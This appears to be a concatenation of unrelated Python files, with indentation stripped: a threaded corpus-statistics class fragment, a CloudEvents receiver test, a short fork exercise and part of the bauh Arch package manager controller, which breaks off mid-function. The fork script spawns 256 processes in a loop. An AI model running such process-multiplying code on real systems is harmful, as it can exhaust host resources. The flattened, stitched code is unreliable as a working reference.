self.logger.low_debug("'{}'-Waiter: {}sec was gone.".format(waitername, sec_to_log))
if not self.threads_status_bucket.empty():
answer = self.threads_status_bucket.get()
#p(answer, c="m")
thread_name = answer["name"]
status = answer["status"]
if status == "done":
if thread_name not in self.threads_success_exit:
self.threads_success_exit.append(answer)
elif status in ["failed", "terminated"]:
if thread_name not in self.threads_unsuccess_exit:
self.threads_unsuccess_exit.append(answer)
elif status == "ThreadsCrash":
if thread_name not in self.threads_unsuccess_exit:
self.threads_unsuccess_exit.append(answer)
self.terminate_all("ThreadsCrash", thread_name=thread_name)
self.logger.critical("'{}'-Thread returned ThreadCrash-Error. |ErrorTrackID:'{}'| (To see more about it track ErrorID in the logs)".format(thread_name,answer["track_id"]))
return False
else:
self.logger.error("ThreadsWaiter: Unknown Status was send: '{}'. Break the execution! ".format(status), exc_info=self._logger_traceback)
sys.exit()
#self.threads_status_bucket.task_done()
time.sleep(sec_to_wait)
time_counter += sec_to_wait
#p(self.threads_success_exit, "self.threads_success_exit", c="g")
#p(self.active_threads, "self.active_threads", c="g")
#p(self.threads_unsuccess_exit, "self.threads_unsuccess_exit", c="g")
#self._check_threads()
self._check_buckets()
self.logger.debug("Waiter '{}' was stopped. ".format(waitername))
return True
def _init_status_bar_for_current_thread(self,len_inp_data, thread_name="Thread0"):
if self._status_bar:
if self._threads_num>1:
if self._status_bar:
unit = "rows"
self.main_status_bar_of_insertions.unit = unit
self.main_status_bar_of_insertions.total += len_inp_data
if not self._timer_on_main_status_bar_was_reset:
#p(self.main_status_bar_of_insertions.start, "start1")
self.main_status_bar_of_insertions.start= time.time()
#p(self.main_status_bar_of_insertions.start, "start2")
self._timer_on_main_status_bar_was_reset = True
unit = "rows"
status_bar_insertion_in_the_current_thread = self._get_new_status_bar(len_inp_data, "{}:Insertion".format(thread_name), unit)
if self._status_bar:
self._check_termination(thread_name=thread_name)
self.logger.debug("_InitCurrentStatusBar: Was initialized for '{}'-Thread. ".format(thread_name))
return status_bar_insertion_in_the_current_thread
else:
return False
def _initialisation_computation_process(self,thread_name="Thread0"):
### Preprocessors Initialization
#print(self.preprocessors)
if thread_name not in self.preprocessors:
if not self._init_preprocessors(thread_name=thread_name):
self.logger.error("Error during Preprocessors initialization. Thread '{}' was stopped.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":"Error during Preprocessors initialization"})
self._terminated.value = True
return False
#print(self.preprocessors)
self.logger.debug("_InitComputationalProcess: Was initialized for '{}'-Thread. ".format(thread_name))
self._check_termination(thread_name=thread_name)
def _is_redu(self, sent_index, token_index,redu_free_text_container):
try:
redu_free_text_container[sent_index][token_index][1].items
return True
except (AttributeError, IndexError, KeyError, TypeError):  # lookup failed, so this position holds no redu entry
return False
def _check_buckets(self):
status = False
if not self.threads_error_bucket.empty():
while not self.threads_error_bucket.empty():
e = self.threads_error_bucket.get()
#self.threads_error_bucket.task_done()
self.logger.error("InsertionError(in_thread_error_bucket): '{}'-Thread throw following Exception: '{}'. ".format(e[0], e[1]), exc_info=self._logger_traceback)
status = True
# if not self.channels_error_bucket.empty():
# while not self.channels_error_bucket.empty():
# e = self.channels_error_bucket.get()
## self.channels_error_bucket.task_done()
# self.logger.error("InsertionError(in_channel_error_bucket): '{}'-Thread ('{}') throw following Exception: '{}'. ".format(e[0], e[1],e[2]), exc_info=self._logger_traceback)
# status = True
if status:
self.logger.error("BucketChecker: Some threads/channels throw exception(s). Program can not be executed. ".format(), exc_info=self._logger_traceback)
sys.exit()
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def _isrighttype(self, inp_data):
#p(inp_data)
check = (isinstance(inp_data, list), isinstance(inp_data, LenGen))
#p(check, "check")
if True not in check:
self.logger.error("InputValidationError: Given 'inpdata' is not iterable. ", exc_info=self._logger_traceback)
return False
return True
# def _isrighttype(self, inp_data):
# check = (isinstance(inp_data, list), isinstance(inp_data, types.GeneratorType))
# if True not in check:
# self.logger.error("InputValidationError: Given 'inpdata' is not iterable. ", exc_info=self._logger_traceback)
# return False
# return True
def _check_corp_should_exist(self):
if not self.corp:
self.logger.error("No active CorpusObj was found. You need to connect or initialize a Corpus first, before you can make any operation with Stats.", exc_info=self._logger_traceback)
return False
else:
return True
def _check_stats_db_should_exist(self):
if not self.statsdb:
self.logger.error("No active DB was found. You need to connect or initialize a DB first, before you can make any operation with Stats.", exc_info=self._logger_traceback)
return False
else:
return True
def _check_stats_db_should_not_exist(self):
if self.statsdb:
self.logger.error("An active DB was found. You need to initialize new empty Instance of DB before you can do this operation.", exc_info=self._logger_traceback)
return False
else:
return True
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
###################################Other Classes#####################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
|
kncloudevents.py | #!/usr/bin/env python
"""
Copyright 2019 The Elegant Monkeys
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import json
import time
from kncloudevents import kncloudevents
from cloudevents.sdk import marshaller
from cloudevents.sdk.event import v03
from cloudevents.sdk import converters
import requests
from multiprocessing import Process
m = marshaller.NewDefaultHTTPMarshaller()
event = (
v03.Event().
SetContentType("application/json").
SetData({"name": "denis"}).
SetEventID("my-id").
SetSource("testing").
SetEventType("cloudevent.event.type")
)
url = "http://localhost:8080"
def func(e):
assert e.Data() == {"name": "denis"}
server = Process(target=lambda: kncloudevents.CloudeventsServer().start_receiver(func))
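# Note: func runs inside the receiver's child process, so a failing assert there will not fail these unittest cases; it only surfaces in the child's output.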
class TestKncloudevents(unittest.TestCase):
"""Tests for `kncloudevents` package."""
@classmethod
def setUpClass(cls):
server.start()
time.sleep(1)  # give the receiver process a moment to bind to its port before the tests send requests
@classmethod
def tearDownClass(cls):
server.terminate()
def test_structured(self):
structured_headers, structured_data = m.ToRequest(event, converters.TypeStructured, json.dumps)
requests.post(url, headers=structured_headers, data=structured_data.getvalue())
def test_binary(self):
binary_headers, binary_data = m.ToRequest(event, converters.TypeBinary, json.dumps)
requests.post(url, headers=binary_headers, data=binary_data)
|
pl_3_23.py | import os, sys
import multiprocessing
"""
def files_w():
file=open("TMP"+str(os.getpid()),'w')
file.close()
for i in range(8):
newp = multiprocessing.Process(target=files_w)
newp.start()
newp.join()
"""
for i in range(8):
os.fork()
file=open("TMP"+str(os.getpid()),'w')
file.close() |
controller.py | import glob
import json
import os
import re
import shutil
import subprocess
import tarfile
import time
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Dict, Iterable, Optional, Collection
import requests
from dateutil.parser import parse as parse_date
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageUpdate, PackageHistory, SoftwarePackage, PackageSuggestion, PackageStatus, \
SuggestionPriority, CustomSoftwareAction
from bauh.api.abstract.view import MessageType, FormComponent, InputOption, SingleSelectComponent, SelectViewType, \
ViewComponent, PanelComponent, MultipleSelectComponent, TextInputComponent, TextInputType, \
FileChooserComponent, TextComponent
from bauh.api.constants import TEMP_DIR
from bauh.api.exception import NoInternetException
from bauh.commons import user, system
from bauh.commons.boot import CreateConfigFile
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_subprocess, run_cmd, SimpleProcess
from bauh.commons.util import datetime_as_milis
from bauh.commons.view_utils import new_select
from bauh.gems.arch import aur, pacman, makepkg, message, confirmation, disk, git, \
gpg, URL_CATEGORIES_FILE, CATEGORIES_FILE_PATH, CUSTOM_MAKEPKG_FILE, SUGGESTIONS_FILE, \
get_icon_path, database, mirrors, sorting, cpu_manager, UPDATES_IGNORED_FILE, \
CONFIG_DIR, EDITABLE_PKGBUILDS_FILE, URL_GPG_SERVERS, BUILD_DIR, rebuild_detector
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.config import get_build_dir, ArchConfigManager
from bauh.gems.arch.dependencies import DependenciesAnalyser
from bauh.gems.arch.download import MultithreadedDownloadService, ArchDownloadException
from bauh.gems.arch.exceptions import PackageNotFoundException, PackageInHoldException
from bauh.gems.arch.mapper import AURDataMapper
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.output import TransactionStatusHandler
from bauh.gems.arch.pacman import RE_DEP_OPERATORS
from bauh.gems.arch.updates import UpdatesSummarizer
from bauh.gems.arch.worker import AURIndexUpdater, ArchDiskCacheUpdater, ArchCompilationOptimizer, RefreshMirrors, \
SyncDatabases
URL_GIT = 'https://aur.archlinux.org/{}.git'
URL_SRC_INFO = 'https://aur.archlinux.org/cgit/aur.git/plain/.SRCINFO?h='
RE_SPLIT_VERSION = re.compile(r'([=><]+)')
SOURCE_FIELDS = ('source', 'source_x86_64')
RE_PRE_DOWNLOAD_WL_PROTOCOLS = re.compile(r'^(.+::)?(https?|ftp)://.+')
RE_PRE_DOWNLOAD_BL_EXT = re.compile(r'.+\.(git|gpg)$')
RE_PKGBUILD_PKGNAME = re.compile(r'pkgname\s*=.+')
RE_CONFLICT_DETECTED = re.compile(r'\n::\s*(.+)\s+are in conflict\s*.')
RE_DEPENDENCY_BREAKAGE = re.compile(r'\n?::\s+installing\s+(.+\s\(.+\))\sbreaks\sdependency\s\'(.+)\'\srequired\sby\s(.+)\s*', flags=re.IGNORECASE)
RE_PKG_ENDS_WITH_BIN = re.compile(r'.+[\-_]bin$')
class TransactionContext:
def __init__(self, aur_supported: bool, name: str = None, base: str = None, maintainer: str = None, watcher: ProcessWatcher = None,
handler: ProcessHandler = None, dependency: bool = None, skip_opt_deps: bool = False, root_password: str = None,
build_dir: str = None, project_dir: str = None, change_progress: bool = False, arch_config: dict = None,
install_files: Set[str] = None, repository: str = None, pkg: ArchPackage = None,
remote_repo_map: Dict[str, str] = None, provided_map: Dict[str, Set[str]] = None,
remote_provided_map: Dict[str, Set[str]] = None, aur_idx: Set[str] = None,
missing_deps: List[Tuple[str, str]] = None, installed: Set[str] = None, removed: Dict[str, SoftwarePackage] = None,
disk_loader: DiskCacheLoader = None, disk_cache_updater: Thread = None,
new_pkg: bool = False, custom_pkgbuild_path: str = None,
pkgs_to_build: Set[str] = None, last_modified: Optional[int] = None,
commit: Optional[str] = None, update_aur_index: bool = False):
self.aur_supported = aur_supported
self.name = name
self.base = base
self.maintainer = maintainer
self.watcher = watcher
self.handler = handler
self.dependency = dependency
self.skip_opt_deps = skip_opt_deps
self.build_dir = build_dir
self.project_dir = project_dir
self.root_password = root_password
self.change_progress = change_progress
self.repository = repository
self.config = arch_config
self.install_files = install_files
self.pkg = pkg
self.provided_map = provided_map
self.remote_repo_map = remote_repo_map
self.remote_provided_map = remote_provided_map
self.aur_idx = aur_idx
self.missing_deps = missing_deps
self.installed = installed
self.removed = removed
self.disk_loader = disk_loader
self.disk_cache_updater = disk_cache_updater
self.pkgbuild_edited = False
self.new_pkg = new_pkg
self.custom_pkgbuild_path = custom_pkgbuild_path
self.pkgs_to_build = pkgs_to_build
self.previous_change_progress = change_progress
self.last_modified = last_modified
self.commit = commit
self.update_aur_index = update_aur_index
@classmethod
def gen_context_from(cls, pkg: ArchPackage, arch_config: dict, root_password: str, handler: ProcessHandler, aur_supported: Optional[bool] = None) -> "TransactionContext":
return cls(name=pkg.name, base=pkg.get_base_name(), maintainer=pkg.maintainer, repository=pkg.repository,
arch_config=arch_config, watcher=handler.watcher, handler=handler, skip_opt_deps=True,
change_progress=True, root_password=root_password, dependency=False,
installed=set(), removed={}, new_pkg=not pkg.installed, last_modified=pkg.last_modified,
aur_supported=aur_supported if aur_supported is not None else (pkg.repository == 'aur' or aur.is_supported(arch_config)))
def get_base_name(self):
return self.base if self.base else self.name
def get_project_dir(self):
return self.project_dir or '.'
def clone_base(self):
return TransactionContext(watcher=self.watcher, handler=self.handler, root_password=self.root_password,
arch_config=self.config, installed=set(), removed={}, aur_supported=self.aur_supported)
def gen_dep_context(self, name: str, repository: str):
dep_context = self.clone_base()
dep_context.name = name
dep_context.repository = repository
dep_context.dependency = True
dep_context.change_progress = False
dep_context.installed = set()
dep_context.removed = {}
return dep_context
def has_install_files(self) -> bool:
return bool(self.install_files)
def get_packages_paths(self) -> Set[str]:
return self.install_files if self.install_files else {self.name}
def get_package_names(self) -> Set[str]:
return self.pkgs_to_build if (self.pkgs_to_build and self.install_files) else {self.name}
def get_version(self) -> str:
return self.pkg.version if self.pkg else None
def get_aur_idx(self, aur_client: AURClient) -> Set[str]:
if self.aur_idx is None:
if self.aur_supported:
self.aur_idx = aur_client.read_index()
else:
self.aur_idx = set()
return self.aur_idx
def get_provided_map(self) -> Dict[str, Set[str]]:
if self.provided_map is None:
self.provided_map = pacman.map_provided()
return self.provided_map
def get_remote_provided_map(self) -> Dict[str, Set[str]]:
if self.remote_provided_map is None:
self.remote_provided_map = pacman.map_provided(remote=True)
return self.remote_provided_map
def get_remote_repo_map(self) -> Dict[str, str]:
if self.remote_repo_map is None:
self.remote_repo_map = pacman.map_repositories()
return self.remote_repo_map
def disable_progress_if_changing(self):
if self.change_progress:
self.previous_change_progress = True
self.change_progress = False
def restabilish_progress(self):
if self.previous_change_progress is not None:
self.change_progress = self.previous_change_progress
self.previous_change_progress = self.change_progress
class ArchManager(SoftwareManager):
def __init__(self, context: ApplicationContext, disk_cache_updater: Optional[ArchDiskCacheUpdater] = None):
super(ArchManager, self).__init__(context=context)
self.aur_cache = context.cache_factory.new()
# context.disk_loader_factory.map(ArchPackage, self.aur_cache) TODO
self.configman = ArchConfigManager()
self.aur_mapper = AURDataMapper(http_client=context.http_client, i18n=context.i18n, logger=context.logger)
self.i18n = context.i18n
self.aur_client = AURClient(http_client=context.http_client, logger=context.logger, x86_64=context.is_system_x86_64())
self.dcache_updater = None
self.logger = context.logger
self.enabled = True
self.arch_distro = context.distro == 'arch'
self.categories = {}
self.deps_analyser = DependenciesAnalyser(self.aur_client, self.i18n)
self.http_client = context.http_client
self.custom_actions = {
'sys_up': CustomSoftwareAction(i18n_label_key='arch.custom_action.upgrade_system',
i18n_status_key='arch.custom_action.upgrade_system.status',
manager_method='upgrade_system',
icon_path=get_icon_path(),
requires_root=True,
backup=True,
manager=self),
'ref_dbs': CustomSoftwareAction(i18n_label_key='arch.custom_action.refresh_dbs',
i18n_status_key='arch.sync_databases.substatus',
manager_method='sync_databases',
icon_path=get_icon_path(),
requires_root=True,
manager=self),
'ref_mirrors': CustomSoftwareAction(i18n_label_key='arch.custom_action.refresh_mirrors',
i18n_status_key='arch.task.mirrors',
manager_method='refresh_mirrors',
icon_path=get_icon_path(),
requires_root=True,
manager=self),
'clean_cache': CustomSoftwareAction(i18n_label_key='arch.custom_action.clean_cache',
i18n_status_key='arch.custom_action.clean_cache.status',
manager_method='clean_cache',
icon_path=get_icon_path(),
requires_root=True,
refresh=False,
manager=self),
'setup_snapd': CustomSoftwareAction(i18n_label_key='arch.custom_action.setup_snapd',
i18n_status_key='arch.custom_action.setup_snapd.status',
manager_method='setup_snapd',
icon_path=get_icon_path(),
requires_root=False,
refresh=False,
manager=self),
}
self.index_aur = None
self.re_file_conflict = re.compile(r'[\w\d\-_.]+:')
self.disk_cache_updater = disk_cache_updater
@staticmethod
def get_aur_semantic_search_map() -> Dict[str, str]:
return {'google chrome': 'google-chrome',
'chrome google': 'google-chrome',
'googlechrome': 'google-chrome'}
def refresh_mirrors(self, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
available_countries = pacman.list_mirror_countries()
current_countries = pacman.get_current_mirror_countries()
if not available_countries:
self.logger.warning("No country available")
countries = current_countries
else:
country_opts = [InputOption(label=self.i18n['arch.custom_action.refresh_mirrors.location.all'], value='all',
tooltip=self.i18n['arch.custom_action.refresh_mirrors.location.all.tip'])]
mapped_opts = [InputOption(label=' '.join((w.capitalize() for w in self.i18n[' '.join(c.split('_'))].split(' '))),
value=c) for c in available_countries]
mapped_opts.sort(key=lambda o: o.label)
if len(current_countries) == 1 and current_countries[0] == 'all':
default_opts = {country_opts[0]}
else:
default_opts = {o for o in mapped_opts if o.value in current_countries}
country_opts.extend(default_opts)
country_opts.extend((o for o in mapped_opts if o not in default_opts))
select = MultipleSelectComponent(options=country_opts,
default_options=default_opts,
max_per_line=3,
label=self.i18n['arch.custom_action.refresh_mirrors.select_label'])
if watcher.request_confirmation(title=self.i18n['arch.custom_action.refresh_mirrors'],
body=None,
components=[select],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n["cancel"].capitalize()):
countries = select.get_selected_values()
if 'all' in countries or len(countries) == len(available_countries):
countries = ['all']
else:
watcher.print("Aborted by the user")
return False
watcher.change_substatus(self.i18n['arch.custom_action.refresh_mirrors.status.updating'])
if current_countries == countries:
success, output = handler.handle_simple(pacman.refresh_mirrors(root_password))
else:
success, output = handler.handle_simple(pacman.update_mirrors(root_password, countries))
if not success:
watcher.show_message(title=self.i18n["action.failed"].capitalize(),
body=self.i18n['arch.custom_action.refresh_mirrors.failed'],
type_=MessageType.ERROR)
return False
sort_limit = self.configman.get_config()['mirrors_sort_limit']
if sort_limit is not None and isinstance(sort_limit, int) and sort_limit >= 0:
watcher.change_substatus(self.i18n['arch.custom_action.refresh_mirrors.status.sorting'])
handler.handle_simple(pacman.sort_fastest_mirrors(root_password, sort_limit))
mirrors.register_sync(self.logger)
watcher.change_substatus(self.i18n['arch.sync_databases.substatus'])
return self.sync_databases(root_password=root_password, watcher=watcher)
def sync_databases(self, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
success, output = handler.handle_simple(pacman.sync_databases(root_password, force=True))
if not success:
watcher.show_message(title=self.i18n["action.failed"].capitalize(),
body=self.i18n['arch.custom_action.refresh_mirrors.failed'],
type_=MessageType.ERROR)
return False
database.register_sync(self.logger)
return True
def _fill_repos_search_results(self, query: str, output: dict):
ti = time.time()
output['repositories'] = pacman.search(query)
tf = time.time()
self.logger.info("Repositories search took {0:.2f} seconds".format(tf - ti))
def _fill_aur_search_results(self, query: str, output: dict):
ti = time.time()
api_res = self.aur_client.search(query)
pkgs_found = None
if api_res and api_res.get('results'):
pkgs_found = api_res['results']
else:
tii = time.time()
if self.index_aur:
self.index_aur.join()
aur_index = self.aur_client.read_local_index()
if aur_index:
self.logger.info("Querying through the local AUR index")
to_query = set()
for norm_name, real_name in aur_index.items():
if query in norm_name:
to_query.add(real_name)
if len(to_query) == 25:
break
pkgs_found = self.aur_client.get_info(to_query)
tif = time.time()
self.logger.info("Query through local AUR index took {0:.2f} seconds".format(tif - tii))
if pkgs_found:
for pkg in pkgs_found:
output['aur'][pkg['Name']] = pkg
tf = time.time()
self.logger.info("AUR search took {0:.2f} seconds".format(tf - ti))
def __fill_search_installed_and_matched(self, query: str, res: dict):
matches = set()
installed = pacman.list_installed_names()
res['installed'] = installed
res['installed_matches'] = matches
if installed and ' ' not in query: # already filling some matches only based on the query
matches.update((name for name in installed if query in name))
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult.empty()
arch_config = self.configman.get_config()
repos_supported, aur_supported = arch_config['repositories'], aur.is_supported(arch_config)
if not any([repos_supported, aur_supported]):
return SearchResult.empty()
res = SearchResult.empty()
search_output, search_threads = {'aur': {}, 'repositories': {}}, []
t = Thread(target=self.__fill_search_installed_and_matched, args=(words, search_output), daemon=True)
t.start()
search_threads.append(t)
if aur_supported:
aur_query = self.get_aur_semantic_search_map().get(words, words)
taur = Thread(target=self._fill_aur_search_results, args=(aur_query, search_output), daemon=True)
taur.start()
search_threads.append(taur)
if repos_supported:
trepo = Thread(target=self._fill_repos_search_results, args=(words, search_output), daemon=True)
trepo.start()
search_threads.append(trepo)
for t in search_threads:
t.join()
for name in {*search_output['repositories'].keys(), *search_output['aur'].keys()}:
if name in search_output['installed']:
search_output['installed_matches'].add(name)
if search_output['installed_matches']:
installed = self.read_installed(disk_loader=disk_loader, names=search_output['installed_matches']).installed
for pkg in installed:
if pkg.repository != 'aur':
if repos_supported:
res.installed.append(pkg)
if pkg.name in search_output['repositories']:
del search_output['repositories'][pkg.name]
elif aur_supported:
res.installed.append(pkg)
if pkg.name in search_output['aur']:
del search_output['aur'][pkg.name]
if search_output['repositories']:
for pkgname, data in search_output['repositories'].items():
res.new.append(ArchPackage(name=pkgname, i18n=self.i18n, **data))
if search_output['aur']:
for pkgname, apidata in search_output['aur'].items():
res.new.append(self.aur_mapper.map_api_data(apidata, None, self.categories))
res.update_total()
return res
def _fill_aur_pkgs(self, aur_pkgs: dict, output: List[ArchPackage], disk_loader: DiskCacheLoader, internet_available: bool,
arch_config: dict, rebuild_check: Optional[Thread], rebuild_ignored: Optional[Thread], rebuild_output: Optional[Dict[str, Set[str]]]):
if internet_available:
try:
pkgsinfo = self.aur_client.get_info(aur_pkgs.keys())
except requests.exceptions.ConnectionError:
self.logger.warning('Could not retrieve installed AUR packages API data. It seems the internet connection is off.')
self.logger.info("Reading only local AUR packages data")
return
if pkgsinfo:
editable_pkgbuilds = self._read_editable_pkgbuilds() if arch_config['edit_aur_pkgbuild'] is not False else None
ignore_rebuild_check = None
if rebuild_ignored and rebuild_output is not None:
rebuild_ignored.join()
ignore_rebuild_check = rebuild_output['ignored']
to_rebuild = None
if rebuild_check and rebuild_output is not None:
self.logger.info("Waiting for rebuild-detector")
rebuild_check.join()
to_rebuild = rebuild_output['to_rebuild']
for pkgdata in pkgsinfo:
pkg = self.aur_mapper.map_api_data(pkgdata, aur_pkgs, self.categories)
pkg.pkgbuild_editable = pkg.name in editable_pkgbuilds if editable_pkgbuilds is not None else None
if pkg.installed:
if disk_loader:
disk_loader.fill(pkg, sync=True)
pkg.update = self._check_aur_package_update(pkg=pkg,
installed_data=aur_pkgs.get(pkg.name, {}),
api_data=pkgdata)
pkg.aur_update = pkg.update # used in 'set_rebuild_check'
if ignore_rebuild_check is not None:
pkg.allow_rebuild = pkg.name not in ignore_rebuild_check
if to_rebuild and not pkg.update and pkg.name in to_rebuild:
pkg.require_rebuild = True
pkg.update_state()
pkg.status = PackageStatus.READY
output.append(pkg)
else:
editable_pkgbuilds = self._read_editable_pkgbuilds() if arch_config['edit_aur_pkgbuild'] is not False else None
for name, data in aur_pkgs.items():
pkg = ArchPackage(name=name, version=data.get('version'),
latest_version=data.get('version'), description=data.get('description'),
installed=True, repository='aur', i18n=self.i18n)
pkg.categories = self.categories.get(pkg.name)
pkg.pkgbuild_editable = pkg.name in editable_pkgbuilds if editable_pkgbuilds is not None else None
if disk_loader:
disk_loader.fill(pkg)
pkg.status = PackageStatus.READY
output.append(pkg)
def _check_aur_package_update(self, pkg: ArchPackage, installed_data: dict, api_data: dict) -> bool:
if pkg.last_modified is None: # if last_modified is not available, then the install_date will be used instead
install_date = installed_data.get('install_date')
if install_date:
try:
pkg.install_date = datetime_as_milis(parse_date(install_date))
except ValueError:
self.logger.error("Could not parse 'install_date' ({}) from AUR package '{}'".format(install_date, pkg.name))
else:
self.logger.error("AUR package '{}' install_date was not retrieved".format(pkg.name))
return self.aur_mapper.check_update(pkg=pkg, last_modified=api_data['LastModified'])
def _fill_repo_updates(self, updates: dict):
updates.update(pacman.list_repository_updates())
def _fill_repo_pkgs(self, repo_pkgs: dict, pkgs: list, aur_index: Optional[Set[str]], disk_loader: DiskCacheLoader):
updates = {}
thread_updates = Thread(target=self._fill_repo_updates, args=(updates,), daemon=True)
thread_updates.start()
repo_map = pacman.map_repositories(repo_pkgs)
thread_updates.join()
self.logger.info("Repository updates found" if updates else "No repository updates found")
for name, data in repo_pkgs.items():
pkgversion = data.get('version')
pkgrepo = repo_map.get(name)
pkg = ArchPackage(name=name,
version=pkgversion,
latest_version=pkgversion,
description=data.get('description'),
maintainer=pkgrepo,
i18n=self.i18n,
installed=True,
repository=pkgrepo,
categories=self.categories.get(name, []))
if updates:
update_version = updates.get(pkg.name)
if update_version:
pkg.latest_version = update_version
pkg.update = True
if disk_loader:
disk_loader.fill(pkg, sync=True)
if pkg.repository == 'aur':
pkg.repository = None
if aur_index and pkg.name not in aur_index:
removed_cat = self.i18n['arch.category.remove_from_aur']
if removed_cat not in pkg.categories:
pkg.categories.append(removed_cat)
pkgs.append(pkg)
def _wait_for_disk_cache(self):
if self.disk_cache_updater and self.disk_cache_updater.is_alive():
self.logger.info("Waiting for disk cache to be ready")
self.disk_cache_updater.join()
self.logger.info("Disk cache ready")
def __fill_packages_to_rebuild(self, output: Dict[str, Set[str]], ignore_binaries: bool):
if rebuild_detector.is_installed():
self.logger.info("rebuild-detector: checking")
to_rebuild = rebuild_detector.list_required_rebuild()
if to_rebuild and ignore_binaries:
to_rebuild = {p for p in to_rebuild if not RE_PKG_ENDS_WITH_BIN.match(p)}
output['to_rebuild'].update(to_rebuild)
self.logger.info("rebuild-detector: {} packages require rebuild".format(len(to_rebuild)))
def __fill_ignored_by_rebuild_detector(self, output: Dict[str, Set[str]]):
output['ignored'].update(rebuild_detector.list_ignored())
def read_installed(self, disk_loader: Optional[DiskCacheLoader], limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None, names: Iterable[str] = None, wait_disk_cache: bool = True) -> SearchResult:
self.aur_client.clean_caches()
arch_config = self.configman.get_config()
aur_supported, repos_supported = aur.is_supported(arch_config), arch_config['repositories']
if not aur_supported and not repos_supported:
return SearchResult.empty()
rebuild_output, rebuild_check, rebuild_ignored = None, None, None
if aur_supported and arch_config['aur_rebuild_detector']:
rebuild_output = {'to_rebuild': set(), 'ignored': set()}
rebuild_check = Thread(target=self.__fill_packages_to_rebuild,
args=(rebuild_output, arch_config['aur_rebuild_detector_no_bin']),
daemon=True)
rebuild_check.start()
rebuild_ignored = Thread(target=self.__fill_ignored_by_rebuild_detector, args=(rebuild_output, ), daemon=True)
rebuild_ignored.start()
installed = pacman.map_installed(names=names)
aur_pkgs, repo_pkgs, aur_index = None, None, None
if repos_supported:
repo_pkgs = installed['signed']
if installed['not_signed']:
if aur_supported:
if self.index_aur:
self.index_aur.join()
aur_index = self.aur_client.read_index()
for pkg in {*installed['not_signed']}:
if pkg not in aur_index:
if repos_supported:
repo_pkgs[pkg] = installed['not_signed'][pkg]
if aur_supported and installed['not_signed']:
del installed['not_signed'][pkg]
aur_pkgs = installed['not_signed']
elif repos_supported:
repo_pkgs.update(installed['not_signed'])
pkgs = []
if repo_pkgs or aur_pkgs:
if wait_disk_cache:
self._wait_for_disk_cache()
map_threads = []
if aur_pkgs:
t = Thread(target=self._fill_aur_pkgs, args=(aur_pkgs, pkgs, disk_loader, internet_available, arch_config, rebuild_check, rebuild_ignored, rebuild_output), daemon=True)
t.start()
map_threads.append(t)
if repo_pkgs:
t = Thread(target=self._fill_repo_pkgs, args=(repo_pkgs, pkgs, aur_index, disk_loader), daemon=True)
t.start()
map_threads.append(t)
for t in map_threads:
t.join()
if pkgs:
ignored = self._list_ignored_updates()
if ignored:
for p in pkgs:
if p.name in ignored:
p.update_ignored = True
return SearchResult(pkgs, None, len(pkgs))
def _downgrade_aur_pkg(self, context: TransactionContext):
if context.commit:
self.logger.info("Package '{}' current commit {}".format(context.name, context.commit))
else:
self.logger.warning("Package '{}' has no commit associated with it. Downgrading will only compare versions.".format(context.name))
context.build_dir = '{}/build_{}'.format(get_build_dir(context.config), int(time.time()))
try:
if not os.path.exists(context.build_dir):
build_dir = context.handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', context.build_dir])))
if build_dir:
context.handler.watcher.change_progress(10)
base_name = context.get_base_name()
context.watcher.change_substatus(self.i18n['arch.clone'].format(bold(context.name)))
cloned, _ = context.handler.handle_simple(git.clone_as_process(url=URL_GIT.format(base_name), cwd=context.build_dir))
context.watcher.change_progress(30)
if cloned:
context.watcher.change_substatus(self.i18n['arch.downgrade.reading_commits'])
clone_path = '{}/{}'.format(context.build_dir, base_name)
context.project_dir = clone_path
srcinfo_path = '{}/.SRCINFO'.format(clone_path)
logs = git.log_shas_and_timestamps(clone_path)
context.watcher.change_progress(40)
if not logs or len(logs) == 1:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.impossible'].format(context.name),
type_=MessageType.ERROR)
return False
if context.commit:
target_commit, target_commit_timestamp = None, None
for idx, log in enumerate(logs):
if context.commit == log[0] and idx + 1 < len(logs):
target_commit = logs[idx + 1][0]
target_commit_timestamp = logs[idx + 1][1]
break
if not target_commit:
self.logger.warning("Could not find '{}' target commit to revert to".format(context.name))
else:
context.watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
checkout_proc = new_subprocess(['git', 'checkout', target_commit], cwd=clone_path)
if not context.handler.handle(SystemProcess(checkout_proc, check_error_output=False)):
context.watcher.print("Could not rollback to current version's commit")
return False
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.last_modified = target_commit_timestamp
context.commit = target_commit
return self._build(context)
# trying to downgrade by version comparison
commit_found, commit_date = None, None
srcfields = {'pkgver', 'pkgrel', 'epoch'}
for idx in range(1, len(logs)):
